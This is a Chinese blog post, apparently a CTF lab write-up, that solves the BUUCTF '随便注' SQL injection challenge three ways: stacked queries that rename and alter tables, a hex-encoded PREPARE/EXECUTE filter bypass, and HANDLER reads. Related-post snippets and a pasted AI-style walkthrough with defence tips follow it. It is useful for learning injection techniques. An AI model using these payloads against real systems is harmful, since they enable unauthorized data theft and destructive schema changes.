buuctf[强网杯 2019]随便注 1(超详细,三种解法)

原创 已于 2023-10-26 13:26:41 修改 · 7.7k 阅读 · 60 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #网络安全 #web安全

于 2023-10-26 10:12:27 首次发布

第一种解法 堆叠注入

网页环境
image.png
判断是否是字符型注入
1'
image.png
判断是否存在关键字过滤
select
image.png
联合查询被过滤,只能用堆叠注入了
查看有几个字段
1' order by 2#
image.png
正常回显
1' order by 3#image.png
回显报错,可以看出只有两个字段
查看所有数据库
1'; show databases;
image.png
查看所有数据表
1'; show tables;
image.png
爆words数据表的字段
1';show columns from words;#image.png
爆1919810931114514数据表字段(注意数据表为数字的时候需要用反引号括起来)
1';show columns from 1919810931114514;#
image.png
可以看到这两个表words表有两个字段,而另一个只有一个字段
后台SQL查询语句应该是:
select * from words where id=
所以说只能先查询id字段,然而另一个表只有一个flag字段是肯定爆不了flag的,并且类型为varchar字符串类型,而恰巧words数据表里面的data也是varchar类型,因此从这里就可以得到做题思路,通过rename函数进行改表,把1919810931114514改为words,增加新字段id,将flag改为data,将刚开始那个words表改为其他任意表。
构造payload:
1';rename table words to BaiMao;rename table 1919810931114514 to words;alter table words add id int unsigned not NULL auto_increment primary key;alter table words change flag data varchar(100);#

rename修改表名
alter修改已知的列
add增加
int整数类型
unsigned无符号类型
not null- 指示某列不能存储 NULL 值。
primary key - NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
auto_increment-自动赋值,默认从1开始。

成功回显flag:
image.png
注意没有回显flag,就类似于你更新了个东西但是没刷新,重新在文本框里面输入1提交即可回显flag。

第二种解法 编码逃逸 绕过滤

由于select被过滤,考虑使用编码进行绕过
使用select查询就很简单了
构造payload
select *from where 1919810931114514``(注意这里使用反引号把这个数字包括住,md编辑器打不上去)
*号查询数据表里面的全部内容,这就是爆出flag的原理
进行16进制编码加密
73656c656374202a2066726f6d20603139313938313039333131313435313460
最终payload:
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

  • prepare…from…是预处理语句,会进行编码转换。
  • execute用来执行由SQLPrepare创建的SQL语句。
  • SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
  • 0x就是把后面的编码格式转换成16进制编码格式
  • 那么总体理解就是,使用SeT方法给变量a赋值,给a变量赋的值就是select查询1919810931114514表的所有内容语句编码后的值,execsql方法执行来自a变量的值,prepare…from方法将执行后的编码变换成字符串格式,execute方法调用并执行execsql方法。
    参考:https://blog.csdn.net/qq_44657899/article/details/10323914

回显flag:
image.png

第三种解法 handler代替select

select命令被过滤了怎么办?我们还可以用handler命令进行查看,handler命令可以一行一行的显示数据表中的内容。
构造payload:
1'; handler 1919810931114514open asa; handler a read next;#

handler代替select,以一行一行显示内容
open打开表
as更改表的别名为a
read next读取数据文件内的数据次数

上传payload,回显flag:
image.png

buuctf [强网 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF -web- [强网 2019]随便
qq_44640313的博客
12-14 3193
buuctf强网2019为例的堆叠
强网 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 2561
题目简介 题目名称:[强网 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
BUUCTF】[强网 2019]随便 1
qq_45972928的博客
05-06 4587
这是一个典型的sql入题目 知识点: 1入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF系列】[强网 2019]随便
最新发布
2402_84408069的博客
08-08 1217
本文通过一个SQL入实例,展示了如何利用堆叠入和HANDLER语句绕过WAF防护获取敏感数据的技术研究。作者首先通过简单的输入测试确认存在字符型入漏洞,随后使用ORDER BY确定列数。当发现传统UNION入被过滤后,转而采用堆叠入技术,通过分号执行多条SQL语句,成功获取数据库表结构信息。重点介绍了利用MySQL的HANDLER语句直接读取数字命名表中的flag数据,该技术可绕过常见SELECT过滤。文章包含详细的技术解析、攻击链说明和防御建议,并特别强调所有技术仅限合法授权下的安全研究使用。
[强网 2019]随便 1
tomatoff的博客
03-14 2972
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
BUUCTF——[强网 2019]随便 1
小白一枚多多关注的博客
03-17 559
这道题是强网的题,如果各位之前做过攻防世界有可能就知道强网代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本框以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql入并且sqlmap是做不出来的,所以必须得是手工入,那么手工入就需要判断入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
BUUCTF [web专题7] [强网 2019]随便
yanglinchiji的博客
11-01 122
实现过程就是让`1919810931114514`的flag字段顶替words的输出内容(data字段)最终获取flag(如果执行后没有直接出flag,可以换成 1' or 1=1;本质就是用handler来代替select命令获取字段的数据。再将表`1919810931114514`修改成words。最后将flag改名为data来实现输出flag。简单来说就是将表words修改成其他名字。题目提示有入点,进入靶机后先试一下。这里就列出借鉴中两种我喜欢用的解法意:数字名的表需要用反引号套着。
强网2019 [WEB]:随便 深度解析与漏洞映射
2402_86373248的博客
06-25 803
本次分析的题目来自2019强网WEB赛题“随便”。这道题主要考察的是SQL入漏洞中的堆叠入技术。在比赛中,选手需要通过构造合适的入语句,绕过正则过滤,获取数据库中的关键信息,最终得到flag。本题涉及的漏洞类型为CWE - 89(SQL入),在ATT&CK框架中,对应的技术为T1190(Exploit Public-Facing Application),即利用面向公众的应用程序漏洞。
buuctf [SUCTF 2019]EasySQL
qq_1873822的博客
03-02 482
#这里题目也是类似于[强网 2019]随便 堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM product
BUUCTF-WEB:[强网 2019]随便 1
_Co1a
01-24 1108
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF---[强网 2019]随便1
2201_75556700的博客
01-04 647
8.更改表名列名(因为查询是查id但是id在words中而flag却在另一个表中,于是我们就想到把两个表名换一下,然后flag换为id)是将flag的属性换位id属性。4.接着尝试order by+数字(1' order by 2#)(2' order by 3#)执行第二句的时候会报错,说明表中只有两列数据。5.接下来使用联合查询1' union select 1,2(但是select被过滤了)9.使用1’ or ‘1’='1查看表的内容就可以获得flag。3.尝试0' or '1'='1,发现有回显。
[强网 2019]随便
m0_56691564的博客
11-30 3303
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF [强网 2019]随便 1(两种方法)
热门推荐
m0_62879498的博客
03-05 1万+
[强网 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
buuctf[强网 2019]随便 1
2403_87464189的博客
03-18 359
那么总体理解就是,使用SeT方法给变量a赋值,给a变量赋的值就是select查询1919810931114514表的所有内容语句编码后的值,execsql方法执行来自a变量的值,prepare…from方法将执行后的编码变换成字符串格式,execute方法调用并执行execsql方法。select *from `1919810931114514` 编码为16进制。爆words表的内容1';这里我使用了16进制编码 饶过对select的过滤。1' --+ 继续报错 1'# 成功回显。
BUUCTF-[强网 2019]随便1
Monica的博客
09-06 800
目录 题目: 方法: 其他问题: 1、url中#是特殊字符,参数中有#号的时候需要进行url编码。 2、url中空格变成+和空格变成%20问题 题目: 方法: 只有输入1和2才有结果 发现输出是两列,一列是键,一列是值 测试是什么闭合 输入1'发现有个报错 我们复制near后面的代码,通过一个字符一个字符的删除,发现是: 单引号 单引号 1 单引号 单引号 单引号 所以这不是双引号闭合,而是一个单引号闭合。 测试输出有几列 pa...
BUUCTF: [强网 2019]随便 1
emdog的博客
10-21 403
新手可以看下sql入基础原理(超详细)这篇博客,有一个基本的概念。 点开题目链接看到 首先判断下是什么类型的入,输入1',发现报错,说明是字符型入,单引号闭合 输入1, 输入1' or 1=1#,显示 再测试字段数' order by 1 #,到3时报错,说明字段数为2,即2列。 尝试用union select联合查询继续获取信息,输入1' union select 1,2,database()# database()将会返回当前网站所使用的数据库名字. user()将会返回执行当前查询的用
强网2019随便1,这道题应该怎么解
02-25
<think>好的,用户现在问的是强网2019的“随便”这道题应该怎么解。首先,我需要回忆一下这道题的具体情况。强网的题目通常设计得比较巧妙,可能涉及SQL入的各种绕过技巧。根据名字“随便”可能暗示题目与SQL入有关,而“随便1”可能是一个基础或进阶的题目。 用户之前询问过回显过滤后的堆叠入方法,而这道题可能应用了类似的技巧。需要先确定题目的环境,比如是MySQL、PostgreSQL还是其他数据库。通常,比赛中常见的可能是MySQL,但需要验证。 接下来,用户可能需要解题步骤的详细说明,包括如何判断入点,如何绕过过滤,以及如何最终获取flag。可能存在的过滤包括对select、update、delete等关键字的过滤,或者对某些函数的限制,比如information_schema被过滤,导致无法直接查表。 根据之前的回答,堆叠入可能在允许执行多条语句的情况下有效,但需要结合其他方法如时间盲或修改数据。例如,如果题目过滤了select,可能需要使用预编译语句或者修改表名来绕过。 另外,题目可能使用了MySQL的存储过程或者预处理语句来绕过关键字过滤。例如,使用char()函数编码字符串,或者利用hex编码来绕过过滤。 还需要考虑是否有堆叠入的可能性,比如使用分号执行多条语句,然后通过创建新表或者修改现有表结构来获取数据。例如,如果原始的查询是select,那么入后可以执行alter table或者rename table来改变表结构,从而让后续的查询泄露数据。 另外,可能需要利用MySQL的handler语句来读取数据,因为handler不需要使用select关键字,可能绕过过滤。 还需要意是否有过滤了空格或某些字符,需要使用释符/**/或者括号来绕过。 可能还需要利用information_schema被过滤后的替代方法,比如使用sys.schema_auto_increment_columns或其他系统表来获取表名和列名。 此外,题目可能存在二次入的可能性,或者需要结合报错入来获取信息,但若回显被过滤,可能需要时间盲或外带数据。 假设题目中的过滤规则是过滤了select、update、drop等关键字,那么堆叠入结合预处理语句可能有效。例如,使用set和prepare来构造语句,然后执行。 例如,构造如下的入语句: ';set @sql=concat('s','elect * from `1919810931114514`');prepare stmt from @sql;execute stmt;# 这里将select拆分成concat('s','elect')来绕过关键字过滤,然后预处理并执行。 但可能题目中的过滤机制是否拦截了concat或prepare等关键字也需要考虑。如果prepare被过滤,可能需要其他方法。 另一种方法是使用handler语句,例如: ';handler `1919810931114514` open as a;handler a read first;# 这样可以直接读取表中的数据,而不需要使用select语句。 此外,如果题目中存在多个表,可能需要先通过show tables来获取表名,然后通过desc或show columns来获取列名。但如果select被过滤,可能需要其他方式。 如果题目中的过滤允许使用rename或alter,可以将原来的数据表重命名,然后创建一个同名的表,将数据插入到新表中,再通过正常的查询来获取数据。例如: ';rename table `words` to `temp`;rename table `1919810931114514` to `words`;alter table `words` add column `flag` varchar(100);# 然后访问页面,原本的查询可能从words表中读取数据,此时words表已经被替换为原来的flag表,从而直接显示flag。 这种方法的关键在于利用堆叠入修改表结构,使得后续的查询直接返回flag的内容。 需要确保题目中的MySQL用户有权限执行rename和alter操作,这在比赛中通常是允许的。 此外,可能需要意反引号的使用,避免表名中的数字被解析为数值,所以需要用反引号包裹表名。 总结解题步骤可能如下: 1. 判断入点,确认是否存在堆叠入的可能。 2. 绕过关键字过滤,使用show databases和show tables获取表名。 3. 发现存在两个表:words和1919810931114514。 4. 确认flag在1919810931114514表中,但无法直接查询。 5. 使用堆叠入修改表结构,将flag表重命名为words,并添加列以适应原有查询的结构。 6. 触发原有查询,直接返回flag。 需要验证每一步的可行性,以及绕过过滤的具体方法。例如,如果show被过滤,可能需要其他方式获取表信息。但通常show可能未被过滤,因为属于基础操作。 另外,可能需要使用十六进制或char编码绕过对特定关键字的过滤,例如将select转换为char(115,101,108,101,99,116)等形式。 但根据常见的解法强网2019随便这道题的解法通常是通过堆叠入结合表重命名和修改结构来实现的,而不需要复杂的编码绕过,因为过滤可能主要集中在select等关键字上,而允许alter和rename等操作。 因此,解题思路主要是利用堆叠入执行多条SQL语句,修改表结构,使得原本的查询能够访问到flag表中的数据。</think>--- **强网2019 "随便1" 解题思路详解** 这道题考察 **堆叠入(Stacked Queries)** 和 **巧妙的表结构修改** 绕过过滤的技巧。以下是完整的解题步骤: --- ### **1. 题目环境分析** - **目标**:通过SQL入获取flag。 - **已知条件**: - 输入参数存在SQL入漏洞。 - 后端使用MySQL数据库,且过滤了`select`、`update`、`drop`等关键字。 - 存在两个表:`words`(默认查询的表)和 `1919810931114514`(存储flag的表)。 --- ### **2. 探测入点与堆叠入** **步骤1:确认入类型** 通过输入 `1'` 触发报错,确认存在字符型入,且可能存在堆叠入。 **Payload**: ```sql 1'; show databases; -- ``` 若返回数据库列表,则堆叠入可行。 **步骤2:获取表名** 入 `show tables` 查看所有表: ```sql 1'; show tables; -- ``` 返回结果包含 `words` 和 `1919810931114514`,后者可能是flag表。 **步骤3:获取表结构** 由于`select`被过滤,无法直接查字段,但可通过以下方法推断: - `words` 表结构:默认查询返回 `id` 和 `data` 字段。 - `1919810931114514` 表结构:假设含 `flag` 字段。 --- ### **3. 绕过过滤的核心思路** 由于直接查询`1919810931114514`表被`select`过滤,需通过 **修改表名和结构**,使程序原本对`words`表的查询实际访问`1919810931114514`表。 --- ### **4. 详细攻击步骤** **步骤1:重命名原表** 将默认查询的 `words` 表重命名为临时表: ```sql 1'; rename table `words` to `temp`; -- ``` **步骤2:将flag表重命名为words** 将 `1919810931114514` 表重命名为 `words`: ```sql 1'; rename table `1919810931114514` to `words`; -- ``` **步骤3:修改新表结构** 原程序查询 `words` 表时,默认查询 `id` 和 `data` 字段。需为新的 `words` 表添加 `id` 字段: ```sql 1'; alter table `words` add `id` int(10) unsigned NOT NULL AUTO_INCREMENT; -- ``` **步骤4:触发查询** 提交 `1' or 1=1; -- `,程序执行默认查询: ```sql select id, data from words where id = '1' or 1=1; ``` 此时实际查询的是原 `1919810931114514` 表的内容,flag会被返回。 --- ### **5. 简化Payload(一步到位)** 直接通过堆叠入完成所有操作: ```sql 1'; rename table `words` to `temp`; rename table `1919810931114514` to `words`; alter table `words` add `id` int(10) unsigned NOT NULL AUTO_INCREMENT; -- ``` 提交后,访问页面即可直接显示flag。 --- ### **6. 关键绕过技巧** - **堆叠入**:利用分号执行多条SQL语句。 - **表名重命名**:绕过对`select`的过滤,直接修改程序查询的目标表。 - **字段适配**:通过`alter table`添加与原表结构匹配的字段,确保程序正常执行查询。 --- ### **7. 防御建议** - **禁用堆叠查询**:配置数据库仅允许单条语句执行。 - **严格过滤输入**:使用预编译语句(Prepared Statements)而非拼接SQL。 - **最小化权限**:数据库账户禁止执行`rename`、`alter`等高风险操作。 --- ### **总结** 通过堆叠入修改表名和结构,将包含flag的表伪装成程序默认查询的表,从而绕过对`select`的过滤。此方法巧妙利用了MySQL的DDL(数据定义语言)特性,是CTF中常见的“结构绕过”思路。
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫٩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值